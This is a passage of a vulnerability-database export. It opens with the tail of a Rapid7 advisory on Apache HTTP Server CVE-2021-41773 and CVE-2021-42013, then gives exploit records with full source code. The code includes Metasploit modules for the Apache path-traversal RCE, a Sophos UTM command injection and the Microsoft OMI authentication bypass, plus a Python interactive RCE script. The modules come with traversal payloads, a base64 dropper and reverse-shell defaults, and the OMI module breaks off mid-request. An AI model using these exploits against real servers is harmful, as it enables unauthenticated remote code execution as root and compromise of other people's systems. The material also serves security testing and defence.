Updating to HTTP Server 2.4.51 remediates both CVE-2021-41773 and CVE-2021-42013. For more information, see [Apache\u2019s advisory here](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\n## Rapid7 customers\n\nA remote vulnerability check for CVE-2021-41773 was released to InsightVM and Nexpose customers in the October 6, 2021 content update.\n\nA remote vulnerability check for CVE-2021-42013 was released to InsightVM and Nexpose customers in the October 7, 2021 content update.\n\n## Updates\n\n**October 7, 2021:** Apache has updated their advisory to note that the patch for CVE-2021-41773 was incomplete, rendering HTTP Server 2.4.50 versions vulnerable when specific, non-default conditions are met. According to their advisory, "an attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration _require all denied_, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution."\n\nCVE-2021-42013 has been assigned to track the incomplete fix for CVE-2021-41773. CVE-2021-42013 has been fixed in HTTP Server version 2.4.51 released October 7, 2021. 
For more information, [see Apache's advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {}, "published": "2021-10-06T16:42:32", "type": "rapid7blog", "title": "Apache HTTP Server CVE-2021-41773 Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-06T16:42:32", "id": "RAPID7BLOG:9C7E6BE350F06790928CFF68E04A6ECE", "href": "https://blog.rapid7.com/2021/10/06/apache-http-server-cve-2021-41773-exploited-in-the-wild/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-23T13:19:11", "description": "This Metasploit module exploits an unauthenticated remote code execution vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, it can be used to execute arbitrary commands. 
This vulnerability has been reintroduced in the Apache 2.4.50 fix (CVE-2021-42013).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-26T00:00:00", "type": "zdt", "title": "Apache 2.4.49 / 2.4.50 Traversal / Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2021-10-26T00:00:00", "id": "1337DAY-ID-36952", "href": "https://0day.today/exploit/description/36952", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE',\n 'Description' => %q{\n This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).\n If files outside of the document 
root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled,\n it can be used to execute arbitrary commands (Remote Command Execution).\n This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n },\n 'References' => [\n ['CVE', '2021-41773'],\n ['CVE', '2021-42013'],\n ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],\n ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],\n ['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']\n ],\n 'Author' => [\n 'Ash Daulton', # Vulnerability discovery\n 'Dhiraj Mishra', # Metasploit auxiliary module\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise)\n ],\n 'DisclosureDate' => '2021-05-10',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path',\n 'Action' => 'CHECK_RCE',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Targets' => [\n [\n 'Automatic (Dropper)',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => 'false'\n }\n }\n ],\n [\n 'Unix Command (In-Memory)',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => 'true'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n 
register_options([\n OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),\n OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),\n OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])\n ])\n end\n\n def cmd_unix_generic?\n datastore['PAYLOAD'] == 'cmd/unix/generic'\n end\n\n def execute_command(command, _opts = {})\n traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'\n\n uri = normalize_uri(datastore['TARGETURI'], traversal.to_s)\n response = send_request_raw({\n 'method' => Rex::Text.rand_text_alpha(3..4),\n 'uri' => uri,\n 'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}\"\n })\n if response && response.body\n return response.body\n end\n\n false\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def pick_payload\n case datastore['CVE']\n when 'CVE-2021-41773'\n payload = '.%2e/'\n when 'CVE-2021-42013'\n payload = '.%%32%65/'\n else\n payload = ''\n end\n\n payload\n end\n\n def exploit\n @proto = (ssl ? 'https' : 'http')\n\n if (!check.eql? 
Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n\n print_status(message(\"Attempt to exploit for #{datastore['CVE']}\"))\n case target['Type']\n when :linux_dropper\n\n file_name = \"/tmp/#{Rex::Text.rand_text_alpha(4..8)}\"\n cmd = \"echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}\"\n\n print_status(message(\"Sending #{datastore['PAYLOAD']} command payload\"))\n vprint_status(message(\"Generated command payload: #{cmd}\"))\n\n execute_command(cmd)\n\n register_file_for_cleanup file_name\n when :unix_command\n vprint_status(message(\"Generated payload: #{payload.encoded}\"))\n\n if !cmd_unix_generic?\n execute_command(payload.encoded)\n else\n received = execute_command(payload.encoded.to_s)\n\n print_warning(message('Dumping command output in response'))\n if !received\n print_error(message('Empty response, no command output'))\n\n return\n end\n print_line(received)\n end\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/36952", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-03T01:49:07", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.50 - Remote Code Execution Exploit (3)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2021-11-11T00:00:00", "id": "1337DAY-ID-37030", "href": "https://0day.today/exploit/description/37030", "sourceData": "# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)\n# Exploit Author: Valentin Lobstein\n# Vendor Homepage: https://apache.org/\n# Software Link: https://github.com/Balgogan/CVE-2021-41773\n# Version: Apache 2.4.49/2.4.50 (CGI enabled)\n# Tested on: Debian GNU/Linux\n# CVE : CVE-2021-41773 / CVE-2021-42013\n# Credits : Lucas Schnell\n\n\n#!/usr/bin/env python3\n#coding: utf-8\n\nimport os\nimport re\nimport sys\nimport time\nimport requests\nfrom colorama import Fore,Style\n\n\nheader = '''\\033[1;91m\n \n \u2584\u2584\u2584 \u2588\u2588\u2593\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2591 \u2588\u2588 \u2593\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2580\u2588\u2588\u2588 \u2584\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2588\u2588\u2588 \n \u2592\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2592\u2588\u2588\u2588\u2588\u2584 \u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2593\u2588 \u2580 \u2593\u2588\u2588 \u2592 \u2588\u2588\u2592\u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588 \u2580 \n \u2592\u2588\u2588 \u2580\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2592\u2588\u2588 \u2580\u2588\u2584 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2588\u2591\u2592\u2588\u2588\u2588 \u2593\u2588\u2588 \u2591\u2584\u2588 \u2592\u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2588 \n 
\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2591\u2593\u2588 \u2591\u2588\u2588 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2584 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2592\u2593\u2588 \u2584 \n \u2593\u2588 \u2593\u2588\u2588\u2592\u2592\u2588\u2588\u2592 \u2591 \u2591 \u2593\u2588 \u2593\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2593\u2588\u2592\u2591\u2588\u2588\u2593\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \u2591\u2588\u2588\u2593 \u2592\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2592\u2588\u2588\u2588\u2588\u2592\n \u2592\u2592 \u2593\u2592\u2588\u2591\u2592\u2593\u2592\u2591 \u2591 \u2591 \u2592\u2592 \u2593\u2592\u2588\u2591\u2591 \u2591\u2592 \u2592 \u2591 \u2592 \u2591\u2591\u2592\u2591\u2592\u2591\u2591 \u2592\u2591 \u2591 \u2591 \u2592\u2593 \u2591\u2592\u2593\u2591\u2591 \u2591\u2592 \u2592 \u2591\u2591\u2591 \u2592\u2591 \u2591\n \u2592 \u2592\u2592 \u2591\u2591\u2592 \u2591 \u2592 \u2592\u2592 \u2591 \u2591 \u2592 \u2592 \u2591\u2592\u2591 \u2591 \u2591 \u2591 \u2591 \u2591\u2592 \u2591 \u2592\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\n \u2591 \u2592 \u2591\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591 \n''' + Style.RESET_ALL\n\n\nif len(sys.argv) < 2 :\n print( 'Use: python3 file.py ip:port ' )\n sys.exit()\n\ndef end():\n print(\"\\t\\033[1;91m[!] 
Bye bye !\")\n time.sleep(0.5)\n sys.exit(1)\n\ndef commands(url,command,session):\n directory = mute_command(url,'pwd')\n user = mute_command(url,'whoami')\n hostname = mute_command(url,'hostname')\n advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\\'t an interactive shell)')\n command = input(f\"{Fore.RED}\u256d\u2500{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\\n{Fore.RED}\u2570\u2500{Fore.YELLOW}$ {Style.RESET_ALL}\") \n command = f\"echo; {command};\"\n req = requests.Request('POST', url=url, data=command)\n prepare = req.prepare()\n prepare.url = url \n response = session.send(prepare, timeout=5)\n output = response.text\n print(output)\n if 'clear' in command:\n os.system('/usr/bin/clear')\n print(header)\n if 'exit' in command:\n end()\n\ndef mute_command(url,command):\n session = requests.Session()\n req = requests.Request('POST', url=url, data=f\"echo; {command}\")\n prepare = req.prepare()\n prepare.url = url \n response = session.send(prepare, timeout=5)\n return response.text.strip()\n\n\ndef exploitRCE(payload):\n s = requests.Session()\n try:\n host = sys.argv[1]\n if 'http' not in host:\n url = 'http://'+ host + payload\n else:\n url = host + payload \n session = requests.Session()\n command = \"echo; id\"\n req = requests.Request('POST', url=url, data=command)\n prepare = req.prepare()\n prepare.url = url \n response = session.send(prepare, timeout=5)\n output = response.text\n if \"uid\" in output:\n choice = \"Y\"\n print( Fore.GREEN + '\\n[!] Target %s is vulnerable !!!' % host)\n print(\"[!] Sortie:\\n\\n\" + Fore.YELLOW + output )\n choice = input(Fore.CYAN + \"[?] Do you want to exploit this RCE ? 
(Y/n) : \")\n if choice.lower() in ['','y','yes']:\n while True:\n commands(url,command,session) \n else:\n end() \n else :\n print(Fore.RED + '\\nTarget %s isn\\'t vulnerable' % host)\n except KeyboardInterrupt:\n end()\n\ndef main():\n try:\n apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'\n apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'\n payloads = [apache2449_payload,apache2450_payload]\n choice = len(payloads) + 1\n print(header)\n print(\"\\033[1;37m[0] Apache 2.4.49 RCE\\n[1] Apache 2.4.50 RCE\")\n while choice >= len(payloads) and choice >= 0:\n choice = int(input('[~] Choice : '))\n if choice < len(payloads):\n exploitRCE(payloads[choice])\n except KeyboardInterrupt:\n print(\"\\n\\033[1;91m[!] Bye bye !\")\n time.sleep(0.5)\n sys.exit(1)\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/37030", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-25T17:20:35", "description": "This Metasploit module exploits an SID-based command injection in Sophos UTM's WebAdmin interface to execute shell commands as the root user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-31T00:00:00", "type": "zdt", "title": "Sophos UTM WebAdmin SID Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2021-10-31T00:00:00", "id": "1337DAY-ID-36966", "href": "https://0day.today/exploit/description/36966", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Sophos UTM WebAdmin SID Command Injection',\n 'Description' => %q{\n This module exploits an SID-based command injection in Sophos UTM's\n WebAdmin interface to execute shell commands as the root user.\n },\n 'Author' => [\n # Discovered by unknown researcher(s)\n 'Justin Kennedy', # Analysis and PoC\n 'wvu' # Supplementary analysis and exploit\n ],\n 'References' => [\n ['CVE', '2020-25223'],\n ['URL', 'https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce'],\n ['URL', 'https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223'],\n ['URL', 'https://attackerkb.com/assessments/d6e0dff3-dd46-4f19-831d-c3f3f2fa972a']\n ],\n 'DisclosureDate' => '2020-09-18',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 
'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 4444,\n 'LPORT' => 443, # XXX: Bypass Sophos UTM's egress filtering\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [FIRST_ATTEMPT_FAIL],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def stopwatch\n # https://blog.dnsimple.com/2018/03/elapsed-time-with-ruby-the-right-way/\n start = Process.clock_gettime(Process::CLOCK_MONOTONIC)\n ret = yield\n elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - start\n\n [ret, elapsed]\n end\n\n def check\n sleep_time = rand(5..10)\n\n injected, elapsed_time = stopwatch do\n inject_cmd(\"sleep #{sleep_time}\", timeout: sleep_time * 1.5)\n end\n\n return CheckCode::Unknown if injected.nil?\n\n vprint_status(\"Elapsed time: #{elapsed_time} seconds\")\n\n # injected == false\n unless injected && elapsed_time > sleep_time\n return CheckCode::Safe('Failed to test command injection.')\n end\n\n # injected == true\n CheckCode::Appears('Successfully tested command injection.')\n end\n\n def exploit\n unless datastore['LPORT'] == 443\n print_warning('LPORT=443 is recommended to bypass egress filtering')\n end\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n # nil or true on success\n if inject_cmd(cmd) == false\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n end\n\n def inject_cmd(cmd, timeout: 3.5)\n vprint_status(\"Injecting command: #{cmd}\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'var'),\n 'ctype' => 'application/json; charset=UTF-8', # NOTE: charset is required\n 'data' => {\n 'SID' => 
\"|#{cmd}|\" # https://perldoc.perl.org/functions/open#Opening-a-filehandle-into-a-command\n }.to_json\n }, timeout)\n\n return unless res\n return false unless res.code == 200 && res.body.include?(alert_msg)\n\n true\n end\n\n def alert_msg\n # {\"RID\":\"\",\"objs\":[{\"js\":\"json_abort(true);\"},{\"alert\":\"Backend connection failed, please click Shift-Reload to try again.\"}]}\n 'Backend connection failed, please click Shift-Reload to try again.'\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36966", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-21T13:34:04", "description": "By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint that will cause it to execute an operating system command as the root user. This vulnerability was patched in OMI version 1.6.8-1 (released September 8th 2021).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-31T00:00:00", "type": "zdt", "title": "Microsoft OMI Management Interface Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-38647"], "modified": "2021-10-31T00:00:00", "id": "1337DAY-ID-36967", "href": "https://0day.today/exploit/description/36967", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n XML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft OMI Management Interface Authentication Bypass',\n 'Description' => %q{\n By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint\n that will cause it to execute an operating system command as the root user. This vulnerability was patched in\n OMI version 1.6.8-1 (released September 8th 2021).\n },\n 'Author' => [\n 'Nir Ohfeld', # vulnerability discovery & research\n 'Shir Tamari', # vulnerability discovery & research\n 'Spencer McIntyre', # metasploit module\n 'wvu' # vulnerability research\n ],\n 'References' => [\n ['CVE', '2021-38647'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647'],\n ['URL', 'https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure'],\n ['URL', 'https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/'],\n ['URL', 'https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647']\n ],\n 'DisclosureDate' => '2021-09-14',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'unix'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' 
=> :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 5985,\n 'SSL' => false,\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'AKA' => ['OMIGOD'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/wsman'])\n ])\n end\n\n def check\n http_res = send_command('id')\n return CheckCode::Unknown if http_res.nil?\n return CheckCode::Safe unless http_res.code == 200\n\n cmd_res = parse_response(http_res)\n return CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\\d+)\\(\\S+\\) /\n\n return CheckCode::Vulnerable(\"Command executed as uid #{Regexp.last_match(1)}.\")\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n result = execute_command(payload.encoded)\n if result\n print_status(result[:stdout]) unless result[:stdout].blank?\n print_error(result[:stderr]) unless result[:stderr].blank?\n end\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n res = send_command(cmd)\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n\n parse_response(res)\n end\n\n def parse_response(res)\n return nil unless res&.code == 200\n\n # The command itself is not in scope here, so only report the exit status.\n return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i\n unless return_code == 0\n print_error(\"Command exited with non-zero status: #{return_code}\")\n end\n\n {\n return_code: return_code,\n stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,\n stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content\n }\n end\n\n def send_command(cmd)\n 
send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'ctype' => 'text/xml;charset=UTF-8',\n 'data' => Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)\n <s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n <s:Header>\n <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>\n <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n <a:ReplyTo>\n <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n </a:ReplyTo>\n <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n <a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID>\n <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <w:OptionSet s:mustUnderstand=\"true\"/>\n <w:SelectorSet>\n <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n </w:SelectorSet>\n </s:Header>\n <s:Body>\n <p:ExecuteScript_INPUT 